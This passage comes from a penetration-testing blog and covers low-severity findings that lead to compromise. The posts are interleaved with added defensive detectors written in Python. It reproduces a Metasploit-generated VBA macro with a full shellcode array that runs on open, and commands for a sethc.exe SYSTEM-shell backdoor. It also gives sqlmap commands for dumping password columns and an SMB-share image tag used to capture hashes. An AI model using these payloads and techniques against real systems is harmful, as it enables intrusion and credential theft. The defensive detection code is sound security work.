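                issues.append("AUTH_SYS: client-supplied UIDs are trusted (local useradd with a matching UID works)")
            if world and writable:
                severity = "high"
            elif world or root_kept:
                severity = "medium"
            elif not kerberos:
                severity = "low"
            else:
                severity = "info"
            findings.append({"path": path, "client": host, "severity": severity,
                             "options": sorted(opts), "issues": issues})
    return findings


def everyone_exports(showmount_text):
    """Paths that `showmount -e` reports as exported to (everyone)."""
    paths = []
    for line in showmount_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].startswith("/") and "(everyone)" in parts[1]:
            paths.append(parts[0])
    return paths


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f'{f["severity"]:6} {f["path"]:14} {f["client"]:15} {"; ".join(f["issues"])}')
    print("open to everyone per showmount:", everyone_exports(SAMPLE_SHOWMOUNT))
```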
Carnal0wnage
Post [10] Honorable Mention: FCKeditor
FCKeditor is bundled with seems-like everything (ColdFusion, Drupal plugins, WordPress plugins, other random CMSs) and has probably been responsible for countless hacks via file upload issues.
Examples:
http://www.exploit-db.com/exploits/12697/
http://www.exploit-db.com/exploits/15484/
http://www.exploit-db.com/exploits/17644/
Big ol' list on Exploit-DB; CVEdetails on FCKeditor.
LOW?
Actually most FCKeditor checks in Nessus I found were either Medium or High (hence honorable mention and not in the talk).
There is a good write-up of a classic case of FCKeditor abuse here:
http://secureyes.net/nw/assets/File-Upload-Vulnerability-in-FCKEditor.pdf
Google dorks:
inurl:/editor/filemanager/browser/default/connectors/[LANGUAGE]/connector.php
Carnal0wnage
Post [8] Honorable Mention: Log File Injection
So this didn't make it into the talk, but was in the hidden slides...
Not positive this is a "low", but a friend suggested it, so here you go.
Goes like this:
- A request gets logged.
- Something malicious gets written, commonly something like a one-line PHP backdoor.
- Then either:
  1. Use an LFI vulnerability to browse to the page and get a shell
     - Example 1: PHP Shell Injection On A Website Through Log Poisoning http://www.securitytube.net/video/167
     - Rails 3.0.5 Log File Injection http://packetstormsecurity.org/files/99282/Rails-3.0.5-Log-File-Injection-Proof-Of-Concept.html
     - http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
     - Example 2: BURP SUITE - PART IV: LFI EXPLOIT via LOG INJECTION http://kaoticcreations.blogspot.com/2011/12/burp-suite-part-iv-lfi-exploit-via-log_20.html
  2. Wait for an admin to view the logs and do whatever you did (XSS)
     - Example 1: http://xforce.iss.net/xforce/xfdb/50170
     - Example 2: http://www.securityfocus.com/archive/1/464471
Can also do fun stuff like this (TNS logfile injection in Oracle).
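Detection for both branches above, as an added example that is not from the post: it parses Apache combined-format lines, URL-decodes the attacker-controlled fields (request line, Referer, User-Agent), flags PHP open tags and script markup landing in the log, flags requests that pull a log path through an include parameter, and correlates the two per client so the full poisoning chain stands out. The log lines are constructed samples with harmless placeholder tags.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (not real traffic). Lines 2 and 3 carry a harmless
# PHP tag in the path and in the User-Agent, line 4 the same tag URL-encoded, line 5 a script
# tag in the query and Referer, and line 6 the follow-up include of the access log via the
# vulnerable parameter.
SAMPLE_LOG = """203.0.113.5 - - [22/Feb/2010:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Feb/2010:10:01:05 +0000] "GET /<?php echo 'injected'; ?> HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Feb/2010:10:01:07 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "<?php echo 'injected'; ?>"
198.51.100.4 - - [22/Feb/2010:10:02:00 +0000] "GET /%3C%3Fphp+echo+1%3B+%3F%3E HTTP/1.1" 404 210 "-" "curl/7.19"
198.51.100.8 - - [22/Feb/2010:10:03:00 +0000] "GET /search?q=<script>alert(1)</script> HTTP/1.1" 200 1024 "http://evil.example/<script>alert(1)</script>" "Mozilla/5.0"
203.0.113.9 - - [22/Feb/2010:10:01:20 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 9044 "-" "Mozilla/5.0"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Fields the client controls and that land in the log verbatim.
TAINTED_FIELDS = ("request", "referer", "user_agent")

RULES = [
    # PHP open tags (full and short form): the "one line PHP backdoor" landing in the log
    ("php_tag", re.compile(r"<\?(?:php\b|=)", re.I)),
    # script/handler markup aimed at whoever views the log in a browser (the XSS branch)
    ("script_tag", re.compile(r"<script\b|javascript:|\bon(?:error|load)\s*=", re.I)),
    # a request pulling a log file through an include parameter (the LFI branch)
    ("log_path_reference", re.compile(r"/var/log/|/proc/self/", re.I)),
]


def scan_line(line_no, line):
    """Findings for one log line; a line that does not parse is itself a finding."""
    m = COMBINED.match(line)
    if m is None:
        return [{"line": line_no, "ip": None, "field": None, "rule": "unparseable"}]
    findings = []
    for field in TAINTED_FIELDS:
        value = unquote(m.group(field))  # decode %3C%3Fphp and friends before matching
        for rule, pattern in RULES:
            if pattern.search(value):
                findings.append({"line": line_no, "ip": m.group("ip"),
                                 "field": field, "rule": rule})
    return findings


def scan_log(text):
    """Run scan_line over every non-empty line, numbering from 1."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.strip():
            findings.extend(scan_line(line_no, line))
    return findings


def poisoning_chain_ips(findings):
    """Clients that both wrote a PHP tag into the log and fetched a log path: the full chain."""
    by_ip = {}
    for f in findings:
        if f["ip"]:
            by_ip.setdefault(f["ip"], set()).add(f["rule"])
    return {ip for ip, rules in by_ip.items() if {"php_tag", "log_path_reference"} <= rules}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'line {f["line"]}: {f["ip"]} {f["rule"]} in {f["field"]}')
    print("log poisoning chain from:", sorted(poisoning_chain_ips(found)))
```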
Carnal0wnage
Post [7] HTTP PUT/WebDAV/SEARCH
Man, I love misconfigured WebDAV; I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, it's *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.
LOW?
IIS5 is awesome (not) because WebDAV is enabled by default but the web root is not writable. Wait, who still runs Windows 2000?! I know, I know, app can't be rewritten... accepted risk... blah blah... no one will ever use this to pwn my network... it's OK if that DA admin script logs into it daily....
The "game" is finding the writable directory (if one exists) on the WebDAV-enabled server.
*Dirbusting and Ruby FTW*
I find that it's usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help; Nessus will actually tell you the methods allowed per directory... still a challenge though.
Once you have a directory you want to test, you can use cadaver to test manually, davtest, or Ryan Linn's Metasploit module for testing for WebDAV.
I've also done some posts on WebDAV in the past:
http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
http://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.html
hdm had done a post on it in the past in relation to the ASP payload; I can't find it on the R7 site but it's mirrored here:
http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html
Decent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdf
HTTP PUT
HTTP PUT/SEARCH usually gets rolled into
Web scanners are better about alerting on PUT as an available method, and most will attempt the PUT for you. I don't think any vuln scanners do; I'm sure someone will correct me if I'm wrong.
Writable HTTP PUT is rare (least for me), although some friends say they see it all the time.
Metasploit has a module to test for PUT functionality as well:
http://www.metasploit.com/modules/auxiliary/scanner/http/http_put
HTTP SEARCH
HTTP SEARCH can be fun. When enabled, it will give you a listing of every file in the webroot.
Mubix did a post on it:
http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html
Carnal0wnage
Post [6] SharePoint
Misconfigured SharePoint can be *really* useful. Examples of things you can do with it are:
- User/Domain Enumeration
- Access to useful files
Regular / Auth Protected SharePoint also gives you a point to conduct brute-force attacks against AD or SharePoint users.

We regularly find awesome stuff once we have access to SharePoint. It's not uncommon to find service account passwords, alarm information, employee directories, all kinds of useful stuff.
LOW?
Finding SharePoint servers: for random targets, lots of interesting things can be found with Google dorks.

If you need to look at specific servers:
Stach & Liu has released their SharePoint Diggity tools:
http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/
You can also roll your own:
http://code.google.com/p/fuzzdb/source/browse/trunk/Discovery/PredictableRes/Sharepoint.fuzz.txt
Examples of open access

If you have credentials you can use web service calls to pull information from AD; from:
http://blog.mindedsecurity.com/2011/07/athcon-2011-presentation.html
Stuff to read:
http://www.mindedsecurity.com/fileshare/Fedon_Athcon_June11.pdf
http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/
https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29

Carnal0wnage, 5:00
Post [5] Honorable Mention: Null Sessions
Null sessions are old school. They used to be useful for pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.
Where they can come in useful is
- Against mis-configured servers
- Against domain controllers to pull info
Low? Actually a medium...

More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute forcing attacks with.
If you like pretty pictures, it kinda looks like this; there are command line utilities as well...
Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master_browsers do allow this, so if you find yourself in the position to be able to speak with one you can get a list of users for the domain.


You can then take that list of users and do brute force attacks against various services. I rarely fail to find at least one username/username account in an environment.

Carnal0wnage, 9:10
This has been documented all over, but I like things to be on the blog so I can find them...
You can gain a SYSTEM shell on a box you have administrative access on, or if you have physical access to the box and can boot to a repair disk or Linux distro and change files.
Make a copy somewhere of the original sethc.exe on the system:
copy c:\windows\system32\sethc.exe c:\
cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
Copy cmd.exe into sethc.exe's place:
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
or
cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
Reboot, hit the Shift key 5 times, a SYSTEM shell will pop up, do your thing.

It would probably be nice to put sethc.exe back when you are done.
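The swap above leaves an obvious artefact: sethc.exe and cmd.exe become byte-identical. The check below is an added example, not from the post, that hashes both and reports the match; find_swapped_binaries() takes the System32 directory to inspect, and demo() builds a throwaway directory with constructed stand-in files so it runs on any OS.

```python
r"""Detect a swapped sethc.exe (added example, not from the original post).

A straight copy of cmd.exe over sethc.exe, as done above, leaves two files
with identical contents in System32.  This hashes them and reports the
match.  demo() builds a throwaway directory with fake files, so it runs
anywhere; on a real host call find_swapped_binaries(r"C:\Windows\System32").
"""
import hashlib
import os
import shutil
import tempfile


def sha256_of(path):
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_binaries(system32_dir, names=("sethc.exe",)):
    """Return the names whose file contents are byte-identical to cmd.exe.

    `names` defaults to sethc.exe, the binary the post replaces.  A known-good
    baseline hash (taken from an identically patched host) is the complement:
    it catches replacements that are not a plain copy of cmd.exe, which this
    comparison cannot see.
    """
    cmd_hash = sha256_of(os.path.join(system32_dir, "cmd.exe"))
    swapped = []
    for name in names:
        path = os.path.join(system32_dir, name)
        if os.path.isfile(path) and sha256_of(path) == cmd_hash:
            swapped.append(name)
    return swapped


def demo(swap=True):
    """Constructed System32 layout: cmd.exe plus a sethc.exe that either is
    (swap=True) or is not (swap=False) a copy of it."""
    d = tempfile.mkdtemp()
    try:
        with open(os.path.join(d, "cmd.exe"), "wb") as f:
            f.write(b"MZ constructed cmd.exe stand-in")
        if swap:
            shutil.copyfile(os.path.join(d, "cmd.exe"), os.path.join(d, "sethc.exe"))
        else:
            with open(os.path.join(d, "sethc.exe"), "wb") as f:
                f.write(b"MZ constructed sethc.exe stand-in")
        return find_swapped_binaries(d)
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    print("swapped:", demo(), "clean:", demo(swap=False))
```

Run it as a scheduled integrity check alongside a baseline hash of the original file (the post's "make a copy somewhere" step gives you exactly that baseline), and alert on either condition.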

Carnal0wnage, 5:30
Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta. The slides were published here and the video from hashdays is here; no video for BSides ATL.
I consistently violate presentation zen and I try to make my slides usable after the talk, but I decided to do a few blog posts covering the topics I put in the talk anyway.
Post [3] JBoss/Tomcat server-status
There have been some posts/exploits/modules on hitting up unprotected JBoss and Tomcat servers.
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
http://carnal0wnage.attackresearch.com/2009/11/hacking-unprotected-jboss-jmx-console.html
http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
http://goohackle.com/jboss-security-vulnerability-jmx-management-console/
http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer
http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy
Sometimes even though the deployer functionality is password protected the server-status may not be.
/web-console/status?full=true


/manager/status/all

LOW?


This can be useful to find:
- Lists of applications
- Recent URL's accessed
- sometimes with sessionids
- Find hidden services/apps
- Enabled servlets
- owned stuff :-)
Finding 0wned stuff is always fun, let's see.
Looking at the list of applications, one doesn't look normal (zecmd).

Following that down leads us to zecmd.jsp, which is a JSP shell.


If you are interested in zecmd.jsp and the JBoss worm it comes from, this is a good write-up, as well as this OWASP preso:
https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf
thoughts?
-CG

Carnal0wnage, 14:21
scriptjunkie recently had a post on Direct shellcode execution in MS Office macros. I didn't see it go into the Metasploit trunk, but it's there. How to generate macro code is in the post but I'll repost it here so I don't have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.
msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you'll NOT be dropping a vbs or bin, and you'll be running inside of Excel/Word/whatever, so you need to make sure you set up an autorunscript or macro to migrate out of the process; otherwise you'll lose the shell as soon as they exit the Office application.
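The generated macro above has a fixed shape that is easy to look for in VBA source: kernel32 declarations for the memory/thread APIs, a large numeric array holding the payload bytes, and an auto-execute entry point. The scanner below is an added example (not from the post or from Metasploit) that scores VBA text on those three indicators; SAMPLE_MACRO is a hand-written, trimmed stand-in for the generated code and BENIGN_MACRO a normal workbook macro, both constructed for the test. Extracting the VBA from an Office file (olevba does this) is out of scope here; the input is the source text.

```python
"""Static indicators for the macro pattern above (added example, not from the
post or Metasploit).  Looks at VBA source text for the three things the
generated macro needs: Win32 API declarations used to run code from memory,
a large numeric array (the payload bytes) and an auto-execute entry point.
SAMPLE_MACRO is a trimmed, hand-written stand-in for the generated code.
"""
import re

# Declare lines pulling these kernel32 exports are what lets VBA run raw bytes.
INJECTION_APIS = ("VirtualAlloc", "CreateThread", "RtlMoveMemory",
                  "WriteProcessMemory", "CreateRemoteThread")
# Procedure names Office runs without user interaction.
AUTO_EXEC = ("Auto_Open", "AutoOpen", "Workbook_Open", "Document_Open", "AutoExec")

DECLARE_RE = re.compile(r'Declare\s+(?:PtrSafe\s+)?Function\s+(\w+)\s+Lib\s+"kernel32"', re.I)
ARRAY_RE = re.compile(r"Array\s*\(([\s\d,_]+)\)", re.I)
SUB_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)", re.I | re.M)

# Constructed: the declaration/array/entry-point skeleton of the macro above,
# with meaningless parameter names and a made-up byte array.
SAMPLE_MACRO = '''\
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As LongPtr, D As Long, ByVal E As Long, F As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As Long, ByVal D As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal A As LongPtr, ByRef B As Any, ByVal C As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal A As Long, ByVal B As Long, ByVal C As Long, D As Long, ByVal E As Long, F As Long) As Long
#EndIf
Sub Auto_Open()
Dim Buf As Variant
Buf = Array(%s)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
''' % ", ".join(str((i * 37) % 256) for i in range(96))

# Constructed: an ordinary workbook macro that only uses an auto-exec name.
BENIGN_MACRO = '''\
Sub Workbook_Open()
    Range("A1").Font.Bold = True
End Sub
'''


def analyse_vba(source):
    """Return {'apis', 'auto_exec', 'array_bytes', 'score'} for VBA source text.

    score is 0..3: one point each for injection API declarations, an
    auto-execute procedure, and a numeric array of 64 or more elements.
    """
    apis = [a for a in DECLARE_RE.findall(source) if a in INJECTION_APIS]
    auto = [s for s in SUB_RE.findall(source) if s in AUTO_EXEC]
    array_bytes = 0
    for body in ARRAY_RE.findall(source):
        array_bytes = max(array_bytes, len(re.findall(r"\d+", body)))
    score = int(bool(apis)) + int(bool(auto)) + int(array_bytes >= 64)
    return {"apis": sorted(set(apis)), "auto_exec": sorted(set(auto)),
            "array_bytes": array_bytes, "score": score}


if __name__ == "__main__":
    print(analyse_vba(SAMPLE_MACRO))
    print(analyse_vba(BENIGN_MACRO))
```

An auto-exec name alone scores 1 and is normal in business workbooks; it is the combination with kernel32 memory APIs and a byte array that marks this pattern, which is why the score rather than any single indicator should drive an alert.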

Carnal0wnage, 7:17
So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.
To search all databases for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'
To search a specific database for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'
**note, that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs**
[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'
You'll get asked:
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
You'll want to give it a 1 the first time around; it will probably give you stuff like this:
[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords
We now know that we want to go back and enumerate/dump the column values from dbo.mytable in database MYDATABASE to see if there is anything good there. Most likely there is also a userID or LogonId in there we need to extract as well.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1
You could also just do a dump if you want to start grabbing data
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1
If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <-- sometimes works, sometimes doesn't. Not sure what's up with that.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
If you just want to pull out certain columns you can do something like this (assuming columns LogonId and Password):
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)
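From the other side of the wire, a --time-sec run like the one above is loud in the web server log: the query string carries a database delay primitive and the same client gets a run of responses that take about --time-sec seconds. The detector below is an added example, not from the post or from sqlmap; SAMPLE_LOG is a constructed IIS W3C extended log (field order given in FIELDS) that reuses the post's path, with made-up client addresses and timings.

```python
"""Spot time-based blind injection traffic in IIS logs (added example, not
from the original post).  sqlmap's --time-sec mode, as used above against an
.asp app, works by making the database pause; in the web log that shows up
as delay primitives in the query string and as a run of slow responses from
one client.  SAMPLE_LOG is constructed (W3C extended format, field order in
FIELDS); the path echoes the post, the IPs and timings are made up.
"""
import re
import urllib.parse
from collections import Counter

FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
          "sc-substatus", "sc-win32-status", "time-taken"]

# Delay primitives for the engines sqlmap drives in time-based mode.
DELAY_RE = re.compile(r"WAITFOR\s+DELAY|SLEEP\s*\(|BENCHMARK\s*\(|PG_SLEEP\s*\(", re.I)

SAMPLE_LOG = """\
2011-09-12 15:27:30 192.168.1.1 GET /mypath/mypoorlywrittenapp.asp SessionID=8f3a 80 - 10.0.0.7 Mozilla/5.0 200 0 0 31
2011-09-12 15:27:38 192.168.1.1 GET /mypath/mypoorlywrittenapp.asp SessionID=8f3a';WAITFOR+DELAY+'0:0:1'-- 80 - 10.0.0.5 sqlmap/1.0-dev 200 0 0 1042
2011-09-12 15:27:39 192.168.1.1 GET /mypath/mypoorlywrittenapp.asp SessionID=8f3a'+AND+1=1-- 80 - 10.0.0.5 sqlmap/1.0-dev 200 0 0 28
2011-09-12 15:27:41 192.168.1.1 GET /mypath/mypoorlywrittenapp.asp SessionID=8f3a';WAITFOR+DELAY+'0:0:1'-- 80 - 10.0.0.5 sqlmap/1.0-dev 200 0 0 1039
2011-09-12 15:27:45 192.168.1.1 GET /mypath/mypoorlywrittenapp.asp SessionID=%27%3BWAITFOR%20DELAY%20%270%3A0%3A1%27-- 80 - 10.0.0.9 Mozilla/5.0 200 0 0 1051
2011-09-12 15:27:50 192.168.1.1 GET /images/logo.gif - 80 - 10.0.0.7 Mozilla/5.0 200 0 0 4
"""


def parse_line(line):
    """Split one W3C log line into a dict; decode the query; None if malformed."""
    parts = line.split(" ")
    if line.startswith("#") or len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["cs-uri-query"] = urllib.parse.unquote_plus(rec["cs-uri-query"])
    rec["time-taken"] = int(rec["time-taken"])
    return rec


def indicators(rec):
    """Per-request reasons to flag a record."""
    reasons = []
    if DELAY_RE.search(rec["cs-uri-query"]):
        reasons.append("delay primitive in query")
    if "sqlmap" in rec["cs(User-Agent)"].lower():
        reasons.append("sqlmap user-agent")
    return reasons


def scan(log_text, slow_ms=1000):
    """Return (findings, hits_per_client, slow_responses_per_client).

    findings: [(client ip, uri stem, [reasons])].  The user-agent check is
    trivially evaded (sqlmap has --random-agent); the query pattern and the
    slow-response count per client are the parts that survive that.
    """
    findings, hits, slow = [], Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["time-taken"] >= slow_ms:
            slow[rec["c-ip"]] += 1
        reasons = indicators(rec)
        if reasons:
            findings.append((rec["c-ip"], rec["cs-uri-stem"], reasons))
            hits[rec["c-ip"]] += 1
    return findings, hits, slow


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG)[0]:
        print(f)
```

Set slow_ms a little below the delay you expect an attacker to choose (the post uses --time-sec=1) and compare against the page's normal response time; a client whose slow-response count climbs while everyone else's stays flat is the signal even when no known primitive matches.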
-CG

Carnal0wnage, 21:46
Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...
In Office 2010, when I'd go to pull a picture into the document by adding a picture from a network share, the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some HTML to the document.
I ended up adding the following code to the Office document (replace "[" or "]" with "<" or ">"):
[html][body][img src="\\192.168.26.133\share\pwn.jpeg" width=1 height=1][/body][/html]
Once that is done go to Insert --> Object --> Text from File --> select your HTML file

Once that is done, save and open the document; if all is well you'll see the SMB requests to the network share you specified, and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods... I do realize the LM hashes are missing from the smb capture screenie (disabled on Windows 7?) but I was too lazy to install Office on a VM just for the screenshot.


If this doesn't work for anyone let me know.
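The reason the "add a picture" route failed and the HTML route worked is visible inside the file: a .docx is a zip, an embedded picture lives in word/media, and a picture Word has to fetch each time is a relationship with TargetMode="External" (or a literal \\host\share path in the inserted text). The scanner below is an added example, not from the post, that flags both in a document before it reaches a user; build_sample_docx() writes a hand-made minimal package (not a real Word file) so the scanner has input, and 192.0.2.10 is a constructed address standing in for the post's lab host.

```python
r"""Scan a .docx for references that make Word reach out over SMB (added
example, not from the original post).  A .docx is a zip; a picture that is
linked rather than embedded, as the post needed, is a relationship with
TargetMode="External", and inserted HTML/text can carry a literal \\host\share
path.  build_sample_docx() writes a hand-made minimal docx (not a real Word
file) so the scanner has something to run on; 192.0.2.10 is constructed.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
IMAGE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"

# \\host\share[\more] wherever it appears in the package XML.
UNC_RE = re.compile(r"\\\\[^\\\s\"'<>]+(?:\\[^\\\s\"'<>]+)+")


def scan_docx(data):
    """Return [(zip member, reference)] for every external relationship target
    and every UNC path found in the package XML."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            raw = z.read(name)
            if name.endswith(".rels"):
                for rel in ET.fromstring(raw).iter("{%s}Relationship" % RELS_NS):
                    if rel.get("TargetMode") == "External":
                        hits.append((name, rel.get("Target", "")))
            elif name.endswith(".xml"):
                text = raw.decode("utf-8", "replace")
                hits.extend((name, m) for m in UNC_RE.findall(text))
    return hits


def build_sample_docx(image_target=None, external=False, body_text="plain text"):
    """Constructed minimal package: one paragraph of body_text (not XML-escaped,
    keep it free of <>&) and, if image_target is given, one image relationship
    that is external when external=True."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="%s"><w:body><w:p><w:r><w:t>%s</w:t></w:r></w:p>'
                   '</w:body></w:document>' % (WORD_NS, body_text))
        rel = ""
        if image_target is not None:
            rel = '<Relationship Id="rId1" Type="%s" Target="%s"%s/>' % (
                IMAGE_REL, image_target, ' TargetMode="External"' if external else "")
        z.writestr("word/_rels/document.xml.rels",
                   '<Relationships xmlns="%s">%s</Relationships>' % (RELS_NS, rel))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx(r"file:///\\192.0.2.10\share\pwn.jpeg", external=True)
    print(scan_docx(sample))
```

Every external relationship is reported, including plain https ones, because the policy question is the same for all of them: should this document make the reader's machine contact something outside the file when it opens? The scanner only reads the package; it does not resolve or fetch any target.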

Carnal0wnage, 7:47
Part II of the articles based on my Hacking Oracle Web Applications talk was posted on EthicalHacker.net today. Head over there to check it out.
Oracle Web Hacking Part II
